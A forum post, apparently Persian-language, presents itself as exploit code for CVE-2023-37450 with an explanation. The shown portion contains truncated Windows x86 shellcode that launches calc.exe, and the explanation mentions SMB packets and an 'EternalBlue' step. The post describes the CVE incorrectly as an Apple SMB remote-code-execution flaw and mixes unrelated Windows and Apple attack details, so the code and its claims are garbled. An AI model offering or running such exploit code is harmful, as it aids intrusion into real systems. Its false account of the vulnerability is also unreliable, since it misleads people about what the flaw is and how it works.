توییت
actively exploited zero-day (CVE-2023-37450)
This code was written for a newer vulnerability that was discovered in 2023. The vulnerability is identified as CVE-2023-37450 and is an issue in the SMB service that could allow remote code execution. The vulnerability exists in Apple products and Apple has said it has fixed the problem with security updates³⁴⁵. So if the target system is updated, this code will not work. , 8/4/2023 (1) CVE - CVE-2023-37450. https://cve.mitre.org/cgi-bin/cvenam...CVE-2023-37450. (2) NVD - CVE-2023-37450. https://nvd.nist.gov/vuln/detail/CVE-2023-37450. (3) Apple is fixing a critical security bug that affects iOS, macOS and .... https://www.techradar.com/pro/apple-...-that-affects- ios-macos-and-safari-so-patch-now. (4) CVE-2023-38606 & CVE-2023-37450: Apple Addresses Actively Exploited 0 .... https://securityonline.info/cve-2023...ely-exploited- exploited-0-day-flaws/. (5) Apple Addresses Critical Zero-Day Exploit (CVE-2023-37450) with Rapid .... https://socradar.io/apple-addresses-...023-37450-with -rapid-security-response-updates/.
Explanation of the code: The code above is written in Python and consists of several parts: - The first part is the shellcode, which is a small program that can be executed on the target system. This shellcode is a simple program that opens the calculator. This shellcode is written in hexadecimal and starts with b"\xfc\xe8\x82\x00\x00\x00". - The second part is the definition of some helper functions that are used to send and receive data from the socket, create SMB packets and create phasing patterns. These functions start with def and end with return. - The third part is the definition of some constant variables that are needed to set the parameters of the attack. These variables are initialized with the = sign and include IP and port addresses, payload lengths, offsets, etc. - The fourth part is the main part of the code that performs the attack. This part starts with a try loop and ends with an except loop. In this part, first a TCP socket is created to communicate with the SMB server. Then some SMB packets are sent to try to reach the SMB server and find the vulnerable point. After that, a special SMB packet called EternalBlue is sent which contains exploit.py [target_ip] [target_port]
کد:
//Code by e1.coders [B]import socket[/B] [B]import struct[/B] [B]# CVE-2023-37450 exploit code[/B] [B]# Shellcode to execute calc.exe[/B] [B]shellcode = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"[/B] [B]shellcode += b"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"[/B] [B]shellcode += b"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"[/B] [B]shellcode += b"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"[/B] [B]shellcode += b"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"[/B] [B]shellcode += b"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"[/B] [B]shellcode += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"[/B] [B]shellcode += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"[/B] [B]shellcode += b"\x8b\[/B]
نظر